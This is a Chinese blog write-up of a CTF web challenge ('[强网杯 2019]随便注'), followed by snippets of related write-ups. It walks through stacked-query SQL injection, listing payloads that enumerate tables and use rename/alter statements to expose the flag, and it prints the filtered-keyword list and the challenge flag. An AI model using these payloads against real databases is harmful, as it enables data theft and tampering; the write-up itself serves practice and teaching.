[强网杯 2019]随便注1 解题思路(详细版)

最新推荐文章于 2024-04-07 15:17:11 发布
最新推荐文章于 2024-04-07 15:17:11 发布
阅读量198 收藏
点赞数
分类专栏: buuctf 文章标签: 数据库 web安全 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61861243/article/details/133252514
版权

目录

解题思路

本题flag:

解题思路

1、首先通过题目,及页面提示,考虑到题目应该利用sql注入进行解决,首先试一下万能密码,查看一下回显内容

2、既然这样我们就查询一下数据库中的所有表格1' ;show tables;#,这里我们可以得到两个表格words、1919810931114514

4、查看一下两个表格的信息, 1'; show columns from `words`;#查询words表找到了两个属性一个id 一个data;1'; show columns from `1919810931114514`;#查询1919810931114514

表我们发现有关flag的提示词。

3、根据上一步题目查询我们可以推测出页面在所有访问过程中的回显,都是回显的words的内容

4、我再使用select id,data from word where id =语句查询一下words表,但是我们发现select|update|delete|drop|insert|where|等关键字都被过滤

回显的正则过滤规则:\用1' ;union seclect 1,2;#来得到,其中回显的函数全都是被过滤掉的,我们由此可以知道哪些函数没有用,这里的被过滤函数出现了select,select被过滤意味着这道题无法联合(union)注入。

5、我接下来就是用堆叠查询,因为rename和alter都没有被过滤(这里有两种解题思路)

①、将words表名修改,将1919810931114514表名修改为words,然后将原1919810931114514

表中的flag属性修改为id

1';rename table `words` to `word`(words表名修改);rename table `1919810931114514` to `words`(将1919810931114514表名修改为words);alter table `words` change `flag` `id` varchar(100);#

②、将words表名修改,将1919810931114514表名修改为words,然后在1919810931114514表中加入一个id属性,flag属性名修改为data

1';rename table `words` to `word`;rename table `1919810931114514` to `words`;alter table `words` add id int(10);alter table `words` change flag data varchar(20);#

6、最后用万能密码就回显flag

本题flag:

flag{720bbcbc-a615-4899-8bf9-999ed3291b8e}

Krismile☜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【BUUCTF】web强网杯2019随便
12-14
开始入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便 1
tomatoff的博客
03-14 2778
1、登录页面: 2、直接提交1: 3、提交1’: 4、提交1": 5、由输入为1’时报错,所以猜测结果语句应该为单引号闭合; 所以提交a’ or ‘1’=‘1,获得: 6、后面不太会了,参考了大佬的文章: [强网杯2019]随便(初学者看过来) 7、先学习下再补充自己的理解 ...
buuctf web题解之[强网杯 2019]随便1详解,网络安全开发了解这些自然无惧面试
最新发布
m0_60666841的博客
04-07 252
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整领取方式在文末!!
【BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 3887
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
buuctf[强网杯 2019]随便 1(超详细,三种解法)
m0_73734159的博客
10-26 1495
网页环境判断是否是字符型入1'判断是否存在关键字过滤select联合查询被过滤,只能用堆叠入了查看有几个字段正常回显回显报错,可以看出只有两个字段查看所有数据库查看所有数据表爆words数据表的字段爆1919810931114514数据表字段(意数据表为数字的时候需要用反引号括起来);可以看到这两个表words表有两个字段,而另一个只有一个字段。
[强网杯 2019]随便1
m0_75178803的博客
11-05 202
打开题目输入1输入1',页面报错,输入1' #页面正常说明1为入点且入方式为字符型的单引号入判断列名输入1' order by 2 # 页面正常1' order by 3 #页面报错说明列名字段数为2接下来我们尝试用联合入的方式爆出数据显示位输入1' union select 1,2 #可以看到过滤了很多东西说明我们用不了联合入,因为过滤了union我们尝试堆叠入来查看有多少个数据库1';我们查看表名1';可以看到当前数据库下有两个表1';
[强网杯 2019]随便.docx
12-18
强网杯
强网杯 WriteUp By Nu1L
08-02
2022年第六届“强网杯”全国网络安全挑战赛
2019 第三届强网杯线上赛.zip
12-17
强网杯
强网杯-upload1
08-08
强网杯强网先锋upload题,题目附件是data.pcapng文件直接打开(如果有wireshark软件)通过观察,发现有两个有用的数据包第一个是No. 2打开
web buuctf [强网杯 2019]随便1
weixin_44214568的博客
07-31 336
1.简单随便填个 1 2.输入 1' 再尝试输入 1' # 有输出,证明确实存在sql入; 3.常用入 a. 1' or 1=1;# b.依次试1' order by 1;# 依次试1' order by 2;# 1' order by 3;# 证明只有两个字段; 4.利用 union select 进行联合查询 1’ union select 1,2;# 正则表达式,难搞哦 5.利用堆叠入 堆叠入原理: 在SQL...
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
BUUCTF-WEB:[强网杯 2019]随便 1
_Co1a
01-24 942
题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境: 尝试入: 解题思路: 1、先尝试用union联合入:第一步、测试入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型 1' [error] 1'# [不报错,正常回显] 1' and 1=1# ...
BUUCTF [强网杯 2019]随便 1(两种方法)
m0_62879498的博客
03-05 1万+
[强网杯 2019]随便 1 第一步,先判断入点的传参方式,发现是get传参。 第二步,判断闭合方式: 1’and 1=1-- q 1’and 1=2-- q 说明闭合方式为 单引号 如果输入1“and 1=1-- q 和1”and 1=2-- q 两次的回显结果一样,说明闭合方式不是 双引号 其他同理 第三步,判断是否有关键字过滤: 先直接输入: select 查看回显,发现: 发现本题过滤关键字:/select|update|delete|drop|insert|where|\.而且不区分
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
SQL Injection8(堆叠入)——强网杯2019随便
kid的博客
05-28 1万+
SQL Injection8(堆叠入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠入的知识,堆叠入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠入原理 在SQL中,...
[强网杯 2019]随便-1
qq_51553814的博客
07-25 176
进入题打开靶场 既然是入,那么先判断入类型。 很容易就可以看出属于字符型入并且字段为2 正常开始入 发现大部分字符都被禁用了 于是使用堆叠入 成功查到所有库的信息,说明堆叠入是可以用的 再看看当前库里的表 show tables; 接着进入一个一个进入表中看看,如果这两个表都没有就必须得去别的库看看了 0’;desc 1919810931114514;# 很明显,有我们想要的flag 说明flag就在这里面 我们再返回查询word 里面有id,有data,而且正好是2个字段,所以猜测数据
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取或者修改数据库中的数据。通常,这种漏洞主要存在于动态网页应用程序中,比如通过用户输入生成SQL查询语句的网页。攻击者可以通过在用户输入的数据中插入SQL代码,从而绕过正常的验证机制,查看、修改或者删除数据库中的数据。 为了解决入漏洞,我们需要在编写动态网页应用程序时,对用户输入的数据进行严格的验证和过滤,避免将恶意代码传递给数据库。 对于buuctf-强网杯2019随便这道题目,我们需要了解题目的具体要求和给定的环境,然后通过分析和尝试来找到漏洞的利用方法。可能的解题思路包括对输入的数据进行SQL入、获取数据库中的信息或者修改数据库中的数据等等。 解决这道题目需要具备一定的网络安全知识和相关工具的使用能力。通过不断的尝试和调试,找到并利用漏洞成功获取到flag(标志),即为完成题目。 总之,buuctf-强网杯2019随便是一道涉及入漏洞的CTF题目,要求我们通过找到并利用漏洞来获取flag。完成这道题目需要一定的网络安全知识和技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值